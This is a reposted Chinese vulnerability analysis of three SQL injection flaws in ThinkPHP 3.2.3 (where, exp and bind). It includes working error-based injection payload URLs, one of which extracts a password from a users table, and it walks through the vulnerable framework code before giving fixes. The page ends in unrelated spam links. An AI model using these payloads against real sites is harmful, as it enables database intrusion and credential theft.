安基網 首頁 資訊 安全報 查看內容

ThinkPhp3漏洞原理分析總結

2020-5-4 14:03| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 前言ThinkPhp是目前主流的一款php語言框架,但在使用中,也是產生了很多的高危漏洞。本文小編將從Thinkphp3說起,說明一些tp3框架的漏洞產生原理。使廣大愛好者進一步深刻的理解框架。環境搭建下載源碼編輯器使用了phpstrom配置數據庫添加測試數據Thinkphp3.2.3 where注入payload?id=1 and 1=updatexml ...

前言

ThinkPhp是目前主流的一款php語言框架,但在使用中,也是產生了很多的高危漏洞。本文小編將從Thinkphp3說起,說明一些tp3框架的漏洞產生原理。使廣大愛好者進一步深刻的理解框架。


環境搭建

  • 下載源碼

  • 編輯器使用了phpstrom

  • 配置數據庫

  • 添加測試數據

Thinkphp3.2.3 where注入

  • payload
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23
  • 斷點

分析

  • 經過htmlspecialchars過濾

  • 于442行通過think_filter函數進行過濾

  • 經過ThinkPHP/Library/Think/Model.class.php:779的find()方法

  • 滿足條件則進入

  • 強制進行轉換,轉換為了int形

  • 帶入查詢

  • 步驟
id=1' -> I() -> find() -> __parseOptions() ->_parseType()

滿足條件才能進去__parseOptions()方法

  • 條件
if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))
  • 繞過
index.php?id[where]=3 and 1=1

修復

Thinkphp 3.2.3 exp注入

  • 部署環境

  • payload
http://localhost:8888/tp3/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

分析

  • 進入Model.class.php的822行this>select(this>select(options)

  • 跟進select方法

  • 跟蹤Driver.class.php中的parseSql方法

  • 跟蹤Driver.class.php中的parseWhere方法

  • 經過whereStr.=whereStr.=this->parseWhereItem(this>parseKey(this>parseKey(key), $val)方法,跟蹤進去
需要時數組才可以進去if語句

  • 語句exp直接拼接構成注入
 } elseif ('bind' == $exp) {
// 使用表達式
$whereStr .= $key . ' = :' . $val[1];

修復

使用I方法接受會通過think_filter函數進行過濾

thinkphp 3.2.3 bind注入

  • payload
index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1
  • 環境部署
    public function index()
{
$User = M("Users");
$user['id'] = I('id');
$data['password'] = I('password');
$valu = $User->where($user)->save($data);
var_dump($valu);
}

上文說到除了exp還有bind可以進行注入

  • 報錯

  • 進入update方法

  • 進入到了parseWhereItem方法(bind可以注入)

  • 于函數bindParam進行了添加冒號

  • 在Driver.class.php文件execute中進行冒號替換
if (!empty($this->bind)) {
$that = $this;
$this->queryStr = strtr($this->queryStr, array_map(function ($val) use ($that) {return ''' . $that->escapeString($val) . ''';}, $this->bind));
}
  • 如果payload不是0的話

修復

https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6822467205058265603/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
洗衣店赚钱联系澳洁 广西快乐十分玩法与奖金表 明天涨停股票推荐骗局 2019篮球世界杯开战 财神透密二码 浙江6+1体彩玩法 快乐双彩复式中奖计算 宁夏11选5推荐 电影急速赛车手 山东11选5五码分布走势图真准网 燃气股票推荐